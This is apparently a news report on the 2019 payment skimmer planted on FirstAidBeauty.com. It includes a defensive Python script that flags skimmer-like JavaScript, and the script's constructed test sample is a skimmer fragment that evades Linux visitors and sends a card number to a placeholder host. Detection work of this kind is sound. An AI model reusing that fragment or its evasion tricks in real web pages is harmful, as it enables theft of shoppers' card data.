Security researcher Willem de Groot noted on Oct. 25th that FirstAidBeauty.com was still hosting a malicious credit-card-skimming jQuery library on its front end.
Hacked: @ProcterGamble’s https://t.co/qz62iHDazn has had a payment skimmer since May 5th. Fairly advanced: malware does not activate for non-US visitors, or if you run Linux (ie security researchers). pic.twitter.com/HAc7UunK5n
— Willem de Groot (@gwillem) October 25, 2019
It is said that this malicious code was planted on or before May 5th, 2019 and remained undetected until today.
To make matters worse, Willem de Groot reported the security issue to P&G last week and has received no response as of this writing. He noted that after he published his report, the website became unavailable (returning a 503 Service Unavailable status), then shortly afterwards came back online with the skimmer code removed.
Procter & Gamble acquired FirstAidBeauty.com in 2018 for an estimated $250 million USD.
This malicious code was specifically developed to target only US visitors to the site and skim their credit card information. Furthermore, FirstAidBeauty.com's user base is primarily from the USA according to SimilarWeb reports, which put the US share at 80% or more.
On top of this, the site had an estimated 485,000 visitors from May 2019 to Sept. 2019, which is a conservative estimate from SimilarWeb.com as well.
According to BleepingComputer.com, de Groot spoke about the level of sophistication the malware employed to stay fully undetectable (FUD) for so long, noting that the code went undetected for upwards of 5 months.
“so the level of stealth for this actor is outstanding”, according to Willem de Groot, who had to de-obfuscate and decrypt the code in order to even understand what it was doing. He also noted that the code only targeted visitors from the USA whose systems were NOT running Linux (to avoid scrutiny from security researchers).
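The conditional activation described above (geo-fencing plus a Linux check) is exactly what makes a skimmer invisible to a scanner that runs from a researcher's Linux box outside the US. The following is an added example, not code from the article or from de Groot's published decode: a static triage heuristic that flags front-end scripts which combine an environment gate, access to payment fields, and an outbound send. The three sample scripts and the indicator patterns are constructed assumptions for illustration, not signatures of the FirstAidBeauty skimmer.

```python
"""Heuristic triage of front-end JavaScript for skimmer-style behaviour.

A script is flagged only when it shows all three traits together:
  env_gate        - branches on platform, user agent, language or timezone
  payment_access  - reads card/CVV/expiry fields or walks checkout forms
  exfil           - sends data out (XHR, fetch, beacon, image pixel, base64)
Legitimate checkout code normally has the last two but not the first;
library feature detection normally has only the first.
"""
import re

# Indicator patterns: (category, regex). These are assumed, illustrative
# patterns, not a signature of any particular skimmer.
INDICATORS = [
    ("env_gate", re.compile(r"navigator\.(platform|userAgent|language)", re.I)),
    ("env_gate", re.compile(r"getTimezoneOffset\s*\(")),
    ("env_gate", re.compile(r"\b(Linux|X11)\b")),
    ("payment_access", re.compile(r"\b(card\w*|cvv|cvc|expir\w*)\b", re.I)),
    ("payment_access", re.compile(r"document\.(forms|querySelector(All)?)\b")),
    ("exfil", re.compile(r"\b(XMLHttpRequest|fetch|sendBeacon|new\s+Image)\b")),
    ("exfil", re.compile(r"\b(btoa|atob)\s*\(")),
]

REQUIRED = {"env_gate", "payment_access", "exfil"}


def scan_script(name, source):
    """Return which indicator categories fire and whether all three co-occur."""
    hits = {}
    for category, pattern in INDICATORS:
        for match in pattern.finditer(source):
            hits.setdefault(category, set()).add(match.group(0))
    return {
        "name": name,
        "hits": {k: sorted(v) for k, v in hits.items()},
        "suspicious": REQUIRED.issubset(hits),
    }


def flagged_scripts(scripts):
    """Names of scripts from a {name: source} mapping that trip all three categories."""
    return [n for n, src in scripts.items() if scan_script(n, src)["suspicious"]]


# --- constructed samples (illustrative only, not real site code) ---------------

# Library-style feature detection: gates on the environment, touches no payment data.
SAMPLE_LIBRARY = """
var ua = navigator.userAgent.toLowerCase();
lib.browser = { mozilla: /mozilla/.test(ua) && !/webkit/.test(ua) };
"""

# Merchant's own checkout handler: reads card fields and POSTs to the merchant
# API, but activates for every visitor, so it should NOT be flagged.
SAMPLE_CHECKOUT = """
document.querySelector('form#checkout').addEventListener('submit', function (e) {
  var payload = { cardNumber: e.target.cardNumber.value, expiry: e.target.expiry.value };
  fetch('/api/pay', { method: 'POST', body: JSON.stringify(payload) });
});
"""

# Fragment with all three traits: skips Linux visitors and a timezone range,
# reads a card field, and leaks it via an image request to a placeholder host.
SAMPLE_SUSPECT = """
if (navigator.platform.indexOf('Linux') !== -1) { return; }
if (new Date().getTimezoneOffset() < 240) { return; }
var n = document.querySelector('[name=cardNumber]').value;
new Image().src = 'https://exfil-host.invalid/?d=' + btoa(n);
"""

SAMPLES = {"library": SAMPLE_LIBRARY, "checkout": SAMPLE_CHECKOUT, "suspect": SAMPLE_SUSPECT}

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        result = scan_script(name, src)
        print(name, "SUSPICIOUS" if result["suspicious"] else "ok", result["hits"])
```

This is a triage aid, not a detector of record: the skimmer here was obfuscated and encrypted, which defeats plain regexes, so the durable control is a baseline of hashes for every first- and third-party script served to the checkout page, fetched from a vantage point that matches the victim profile (a US IP, a non-Linux user agent) so that a conditionally activating payload is actually delivered.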
De Groot posted the decoded source code to GitHub on Oct. 25th, making the full source available to anyone who wants to see it.
The FBI issued a press release on Oct. 22nd about e-skimming, which is ramping up across online e-commerce retailers, warning businesses and agencies to ensure all patches and updates are regularly scheduled and deployed, to change default login credentials, to educate employees on security best practices, and to segregate/segment critical systems to limit path/directory and network traversal.
P&G commented after the incident was brought to light, giving BleepingComputer this quote:
“Consumer trust is fundamental to us, and we take data privacy very seriously. As soon as we learned about the compromise of the First Aid Beauty site, we moved quickly to take the site down and minimize the impact to our consumers. We are currently investigating the source of the malware and working to identify and notify those consumers who might have been impacted to ensure we provide them the necessary support.”